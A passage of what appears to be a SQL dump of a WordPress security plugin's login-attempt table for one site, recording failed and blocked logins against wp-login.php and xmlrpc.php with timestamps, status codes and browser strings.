Safari/537.36','loginFailValidUsername',NULL,NULL),(7213,0.000000,1629749134.700438,'\0\0\0\0\0\0\0\0\0\0��ϴ�',0,503,0,0,0,'https://equalitywalk.org.uk/wp-login.php','','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.75 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(7214,0.000000,1629750625.237397,'\0\0\0\0\0\0\0\0\0\0��%�\r�',0,200,0,1,0,'https://equalitywalk.org.uk/wp-login.php','','Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36','loginFailValidUsername',NULL,NULL),(7215,0.000000,1629752078.808684,'\0\0\0\0\0\0\0\0\0\0���!',0,503,0,0,0,'https://equalitywalk.org.uk/wp-login.php','','Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3325.181 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(7216,0.000000,1629754727.310071,'\0\0\0\0\0\0\0\0\0\0��\"}�',0,503,0,0,0,'https://www.equalitywalk.org.uk//xmlrpc.php','','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(7217,0.000000,1629754968.836485,'\0\0\0\0\0\0\0\0\0\0��_�+�',0,503,0,0,0,'https://equalitywalk.org.uk/wp-login.php','','Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.97 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(7218,0.000000,1629757856.825299,'\0\0\0\0\0\0\0\0\0\0��.�yo',0,200,0,1,0,'https://equalitywalk.org.uk/wp-login.php','','Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.80 Safari/537.36','loginFailValidUsername',NULL,NULL),(7219,0.000000,1629759285.158827,'\0\0\0\0\0\0\0\0\0\0��QX4�',0,200,0,1,0,'https://equalitywalk.org.uk/wp-login.php','','Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36','loginFailValidUsername',NULL,NULL),(7220,0.000000,1629762197.817171,'\0\0\0\0\0\0\0\0\0\0��D��U',0,503,0,0,0,'https://equalitywalk.org.uk/wp-login.php','','Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(7221,0.000000,1629763657.233294,'\0\0\0\0\0\0\0\0\0\0���}7�',0,503,0,0,0,'https://equalitywalk.org.uk/wp-login.php','','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(7222,0.000000,1629765118.220774,'\0\0\0\0\0\0\0\0\0\0���Avv',0,503,0,0,0,'https://equalitywalk.org.uk/wp-login.php','','Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2526.106 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(7223,0.000000,1629765564.963533,'\0\0\0\0\0\0\0\0\0\0���w�',0,200,0,0,0,'https://www.equalitywalk.org.uk//xmlrpc.php','','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4240.193 Safari/537.36','loginFailInvalidUsername',NULL,NULL),(7224,0.000000,1629765568.476307,'\0\0\0\0\0\0\0\0\0\0���w�',0,200,0,0,0,'https://www.equalitywalk.org.uk//xmlrpc.php','','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4240.193 Safari/537.36','loginFailInvalidUsername',NULL,NULL),(7225,0.000000,1629765569.324002,'\0\0\0\0\0\0\0\0\0\0���w�',0,200,0,0,0,'https://www.equalitywalk.org.uk//xmlrpc.php','','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4240.193 Safari/537.36','loginFailInvalidUsername',NULL,NULL),(7226,0.000000,1629766578.202958,'\0\0\0\0\0\0\0\0\0\0����n�',0,200,0,1,0,'https://equalitywalk.org.uk/wp-login.php','','Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3325.181 Safari/537.36','loginFailValidUsername',NULL,NULL),(7227,0.000000,1629768041.835561,'\0\0\0\0\0\0\0\0\0\0��\'l\0�',0,200,0,1,0,'https://equalitywalk.org.uk/wp-login.php','','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2526.111 Safari/537.36','loginFailValidUsername',NULL,NULL),(7228,0.000000,1629769503.069145,'\0\0\0\0\0\0\0\0\0\0���Avv',0,503,0,0,0,'https://equalitywalk.org.uk/wp-login.php','','Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2526.106 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(7229,0.000000,1629770973.483358,'\0\0\0\0\0\0\0\0\0\0���]�_',0,200,0,1,0,'https://equalitywalk.org.uk/wp-login.php','','Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.90 Safari/537.36','loginFailValidUsername',NULL,NULL),(7230,0.000000,1629773900.219152,'\0\0\0\0\0\0\0\0\0\0��ghIo',0,503,0,0,0,'https://equalitywalk.org.uk/wp-login.php','','Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/57.0.2987.133 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(7231,0.000000,1629775369.014474,'\0\0\0\0\0\0\0\0\0\0���}7�',0,503,0,0,0,'https://equalitywalk.org.uk/wp-login.php','','Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.86 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(7232,0.000000,1629776823.048899,'\0\0\0\0\0\0\0\0\0\0��QX4�',0,503,0,0,0,'https://equalitywalk.org.uk/wp-login.php','','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.167 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(7233,0.000000,1629778278.932595,'\0\0\0\0\0\0\0\0\0\0��/sM�',0,200,0,1,0,'https://equalitywalk.org.uk/wp-login.php','','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.99 Safari/537.36','loginFailValidUsername',NULL,NULL),(7234,0.000000,1629781194.931311,'\0\0\0\0\0\0\0\0\0\0��C�=�',0,200,0,1,0,'https://equalitywalk.org.uk/wp-login.php','','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.106 Safari/537.36','loginFailValidUsername',NULL,NULL),(7235,0.000000,1629782196.447808,'\0\0\0\0\0\0\0\0\0\0��>�r',0,200,0,0,0,'https://www.equalitywalk.org.uk//xmlrpc.php','','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36','loginFailInvalidUsername',NULL,NULL),(7236,0.000000,1629782200.383636,'\0\0\0\0\0\0\0\0\0\0��>�r',0,200,0,0,0,'https://www.equalitywalk.org.uk//xmlrpc.php','','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36','loginFailInvalidUsername',NULL,NULL),(7237,0.000000,1629782200.861648,'\0\0\0\0\0\0\0\0\0\0��>�r',0,200,0,0,0,'https://www.equalitywalk.org.uk//xmlrpc.php','','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36','loginFailInvalidUsername',NULL,NULL),(7238,0.000000,1629782669.760270,'\0\0\0\0\0\0\0\0\0\0��(z��',0,200,0,1,0,'https://equalitywalk.org.uk/wp-login.php','','Mozilla/5.0 (Windows NT 6.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.112 Safari/537.36','loginFailValidUsername',NULL,NULL),(7239,0.000000,1629784133.115313,'\0\0\0\0\0\0\0\0\0\0���#�',0,200,0,1,0,'https://equalitywalk.org.uk/wp-login.php','','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.86 Safari/537.36','loginFailValidUsername',NULL,NULL),(7240,0.000000,1629785604.905799,'\0\0\0\0\0\0\0\0\0\0����T�',0,200,0,1,0,'https://equalitywalk.org.uk/wp-login.php','','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/32.0.1700.107 Safari/537.36','loginFailValidUsername',NULL,NULL),(7241,0.000000,1629787070.397612,'\0\0\0\0\0\0\0\0\0\0��QEˣ',0,200,0,1,0,'https://equalitywalk.org.uk/wp-login.php','','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.117 Safari/537.36','loginFailValidUsername',NULL,NULL),(7242,0.000000,1629788541.336575,'\0\0\0\0\0\0\0\0\0\0�����',0,200,0,1,0,'https://equalitywalk.org.uk/wp-login.php','','Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.86 Safari/537.36','loginFailValidUsername',NULL,NULL),(7243,0.000000,1629790011.054599,'\0\0\0\0\0\0\0\0\0\0��R@�',0,503,0,0,0,'https://equalitywalk.org.uk/wp-login.php','','Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.132 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(7244,0.000000,1629791481.369074,'\0\0\0\0\0\0\0\0\0\0����/�',0,200,0,1,0,'https://equalitywalk.org.uk/wp-login.php','','Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36','loginFailValidUsername',NULL,NULL),(7245,0.000000,1629792956.009794,'\0\0\0\0\0\0\0\0\0\0��QX4r',0,503,0,0,0,'https://equalitywalk.org.uk/wp-login.php','','Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/57.0.2987.133 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(7246,0.000000,1629795935.372345,'\0\0\0\0\0\0\0\0\0\0���Avv',0,503,0,0,0,'https://equalitywalk.org.uk/wp-login.php','','Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/59.0.3071.115 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(7247,0.000000,1629797428.037186,'\0\0\0\0\0\0\0\0\0\0���b�',0,503,0,0,0,'https://equalitywalk.org.uk/wp-login.php','','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2526.111 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(7248,0.000000,1629798943.392549,'\0\0\0\0\0\0\0\0\0\0���G',0,200,0,1,0,'https://equalitywalk.org.uk/wp-login.php','','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.109 Safari/537.36','loginFailValidUsername',NULL,NULL),(7249,0.000000,1629800650.757049,'\0\0\0\0\0\0\0\0\0\0��_կ�',0,200,0,1,0,'https://equalitywalk.org.uk/wp-login.php','','Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.106 Safari/537.36','loginFailValidUsername',NULL,NULL),(7250,0.000000,1629802470.733848,'\0\0\0\0\0\0\0\0\0\0����%+',0,503,0,0,0,'https://equalitywalk.org.uk/wp-login.php','','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.86 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(7251,0.000000,1629806793.884574,'\0\0\0\0\0\0\0\0\0\0���JL�',0,200,0,0,0,'https://www.equalitywalk.org.uk/wp-login.php','','Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)','loginFailInvalidUsername',NULL,NULL),(7252,0.000000,1629829597.494028,'\0\0\0\0\0\0\0\0\0\0��g�t�',0,200,0,1,0,'https://equalitywalk.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailValidUsername',NULL,NULL),(7253,0.000000,1629830027.674100,'\0\0\0\0\0\0\0\0\0\0��\"@�f',0,200,0,1,0,'https://equalitywalk.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailValidUsername',NULL,NULL),(7254,0.000000,1629830242.301973,'\0\0\0\0\0\0\0\0\0\0���:��',0,200,0,1,0,'https://equalitywalk.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailValidUsername',NULL,NULL),(7255,0.000000,1629830459.792198,'\0\0\0\0\0\0\0\0\0\0��ν�:',0,200,0,1,0,'https://equalitywalk.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailValidUsername',NULL,NULL),(7256,0.000000,1629830693.782294,'\0\0\0\0\0\0\0\0\0\0��B!�l',0,200,0,1,0,'https://equalitywalk.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailValidUsername',NULL,NULL),(7257,0.000000,1629830940.483213,'\0\0\0\0\0\0\0\0\0\0��w4�',0,200,0,1,0,'https://equalitywalk.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailValidUsername',NULL,NULL),(7258,0.000000,1629831424.283601,'\0\0\0\0\0\0\0\0\0\0����0',0,200,0,1,0,'https://equalitywalk.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailValidUsername',NULL,NULL),(7259,0.000000,1629831687.165337,'\0\0\0\0\0\0\0\0\0\0��J�g�',0,200,0,1,0,'https://equalitywalk.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailValidUsername',NULL,NULL),(7260,0.000000,1629831928.323858,'\0\0\0\0\0\0\0\0\0\0���>!�',0,200,0,1,0,'https://equalitywalk.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailValidUsername',NULL,NULL),(7261,0.000000,1629832206.578178,'\0\0\0\0\0\0\0\0\0\0���@u�',0,200,0,1,0,'https://equalitywalk.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailValidUsername',NULL,NULL),(7262,0.000000,1629832499.342892,'\0\0\0\0\0\0\0\0\0\0��gV�]',0,200,0,1,0,'https://equalitywalk.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailValidUsername',NULL,NULL),(7263,0.000000,1629832755.727203,'\0\0\0\0\0\0\0\0\0\0��.ec',0,200,0,1,0,'https://equalitywalk.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailValidUsername',NULL,NULL),(7264,0.000000,1629833072.272083,'\0\0\0\0\0\0\0\0\0\0��N�(�',0,200,0,1,0,'https://equalitywalk.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailValidUsername',NULL,NULL),(7265,0.000000,1629833335.376331,'\0\0\0\0\0\0\0\0\0\0����q',0,200,0,1,0,'https://equalitywalk.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailValidUsername',NULL,NULL),(7266,0.000000,1629833612.857434,'\0\0\0\0\0\0\0\0\0\0�����',0,503,0,0,0,'https://equalitywalk.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(7267,0.000000,1629833885.643257,'\0\0\0\0\0\0\0\0\0\0��C��',0,200,0,1,0,'https://equalitywalk.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailValidUsername',NULL,NULL),(7268,0.000000,1629834159.426127,'\0\0\0\0\0\0\0\0\0\0��g�p',0,200,0,1,0,'https://equalitywalk.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailValidUsername',NULL,NULL),(7269,0.000000,1629834445.194600,'\0\0\0\0\0\0\0\0\0\0�����',0,200,0,1,0,'https://equalitywalk.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailValidUsername',NULL,NULL),(7270,0.000000,1629834716.678204,'\0\0\0\0\0\0\0\0\0\0���\0�',0,200,0,1,0,'https://equalitywalk.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailValidUsername',NULL,NULL),(7271,0.000000,1629835013.003509,'\0\0\0\0\0\0\0\0\0\0�����4',0,200,0,1,0,'https://equalitywalk.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailValidUsername',NULL,NULL),(7272,0.000000,1629835313.170159,'\0\0\0\0\0\0\0\0\0\0���VK�',0,200,0,1,0,'https://equalitywalk.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailValidUsername',NULL,NULL),(7273,0.000000,1629835583.254712,'\0\0\0\0\0\0\0\0\0\0��\"}6�',0,200,0,1,0,'https://equalitywalk.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailValidUsername',NULL,NULL),(7274,0.000000,1629835623.254071,'\0\0\0\0\0\0\0\0\0\0����d�',0,200,0,1,0,'https://equalitywalk.org.uk/xmlrpc.php','','Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; MSN Optimized;ENAU)','loginFailValidUsername',NULL,NULL),(7275,0.000000,1629835900.185537,'\0\0\0\0\0\0\0\0\0\0����',0,200,0,1,0,'https://equalitywalk.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailValidUsername',NULL,NULL),(7276,0.000000,1629836199.571058,'\0\0\0\0\0\0\0\0\0\0��Օg�',0,503,0,0,0,'https://equalitywalk.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(7277,0.000000,1629836479.533595,'\0\0\0\0\0\0\0\0\0\0��g|]�',0,200,0,1,0,'https://equalitywalk.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailValidUsername',NULL,NULL),(7278,0.000000,1629836812.095889,'\0\0\0\0\0\0\0\0\0\0��%�[',0,200,0,1,0,'https://equalitywalk.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailValidUsername',NULL,NULL),(7279,0.000000,1629837415.591419,'\0\0\0\0\0\0\0\0\0\0����z�',0,200,0,1,0,'https://equalitywalk.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailValidUsername',NULL,NULL),(7280,0.000000,1629837707.632327,'\0\0\0\0\0\0\0\0\0\0�����',0,200,0,1,0,'https://equalitywalk.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailValidUsername',NULL,NULL),(7281,0.000000,1629838018.904388,'\0\0\0\0\0\0\0\0\0\0��u,�',0,200,0,1,0,'https://equalitywalk.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailValidUsername',NULL,NULL),(7282,0.000000,1629838326.171033,'\0\0\0\0\0\0\0\0\0\0���֣%',0,200,0,1,0,'https://equalitywalk.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailValidUsername',NULL,NULL),(7283,0.000000,1629838636.343864,'\0\0\0\0\0\0\0\0\0\0���5T�',0,200,0,1,0,'https://equalitywalk.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailValidUsername',NULL,NULL),(7284,0.000000,1629838956.900250,'\0\0\0\0\0\0\0\0\0\0��3�e2',0,200,0,1,0,'https://equalitywalk.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailValidUsername',NULL,NULL),(7285,0.000000,1629839248.056507,'\0\0\0\0\0\0\0\0\0\0���@w',0,200,0,1,0,'https://equalitywalk.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailValidUsername',NULL,NULL),(7286,0.000000,1629839597.041230,'\0\0\0\0\0\0\0\0\0\0�����|',0,200,0,1,0,'https://equalitywalk.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailValidUsername',NULL,NULL),(7287,0.000000,1629839905.681992,'\0\0\0\0\0\0\0\0\0\0������',0,200,0,1,0,'https://equalitywalk.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailValidUsername',NULL,NULL),(7288,0.000000,1629840237.822906,'\0\0\0\0\0\0\0\0\0\0��@�:�',0,200,0,1,0,'https://equalitywalk.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailValidUsername',NULL,NULL),(7289,0.000000,1629840535.673506,'\0\0\0\0\0\0\0\0\0\0���@u_',0,200,0,1,0,'https://equalitywalk.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailValidUsername',NULL,NULL),(7290,0.000000,1629840875.146748,'\0\0\0\0\0\0\0\0\0\0��H�.�',0,503,0,0,0,'https://equalitywalk.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(7291,0.000000,1629841196.958336,'\0\0\0\0\0\0\0\0\0\0��3�e2',0,200,0,1,0,'https://equalitywalk.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailValidUsername',NULL,NULL),(7292,0.000000,1629841513.430899,'\0\0\0\0\0\0\0\0\0\0��k�g�',0,503,0,0,0,'https://equalitywalk.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(7293,0.000000,1629841815.749970,'\0\0\0\0\0\0\0\0\0\0��g|_Y',0,200,0,1,0,'https://equalitywalk.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailValidUsername',NULL,NULL),(7294,0.000000,1629842151.764095,'\0\0\0\0\0\0\0\0\0\0����A',0,200,0,1,0,'https://equalitywalk.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailValidUsername',NULL,NULL),(7295,0.000000,1629842522.418532,'\0\0\0\0\0\0\0\0\0\0��N�(�',0,503,0,0,0,'https://equalitywalk.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(7296,0.000000,1629842852.875101,'\0\0\0\0\0\0\0\0\0\0��k���',0,503,0,0,0,'https://equalitywalk.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(7297,0.000000,1629843169.053845,'\0\0\0\0\0\0\0\0\0\0������',0,200,0,1,0,'https://equalitywalk.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailValidUsername',NULL,NULL),(7298,0.000000,1629843499.259695,'\0\0\0\0\0\0\0\0\0\0���ּ',0,503,0,0,0,'https://equalitywalk.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(7299,0.000000,1629843856.756528,'\0\0\0\0\0\0\0\0\0\0���ŃB',0,200,0,1,0,'https://equalitywalk.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailValidUsername',NULL,NULL),(7300,0.000000,1629844547.659000,'\0\0\0\0\0\0\0\0\0\0��H�.�',0,503,0,0,0,'https://equalitywalk.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(7301,0.000000,1629844912.358742,'\0\0\0\0\0\0\0\0\0\0���VK�',0,503,0,0,0,'https://equalitywalk.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(7302,0.000000,1629845260.893129,'\0\0\0\0\0\0\0\0\0\0����',0,503,0,0,0,'https://equalitywalk.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(7303,0.000000,1629845580.300609,'\0\0\0\0\0\0\0\0\0\0��}Ϋ�',0,503,0,0,0,'https://equalitywalk.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(7304,0.000000,1629845926.434514,'\0\0\0\0\0\0\0\0\0\0������',0,200,0,1,0,'https://equalitywalk.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailValidUsername',NULL,NULL),(7305,0.000000,1629846256.339365,'\0\0\0\0\0\0\0\0\0\0��C͘',0,200,0,1,0,'https://equalitywalk.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 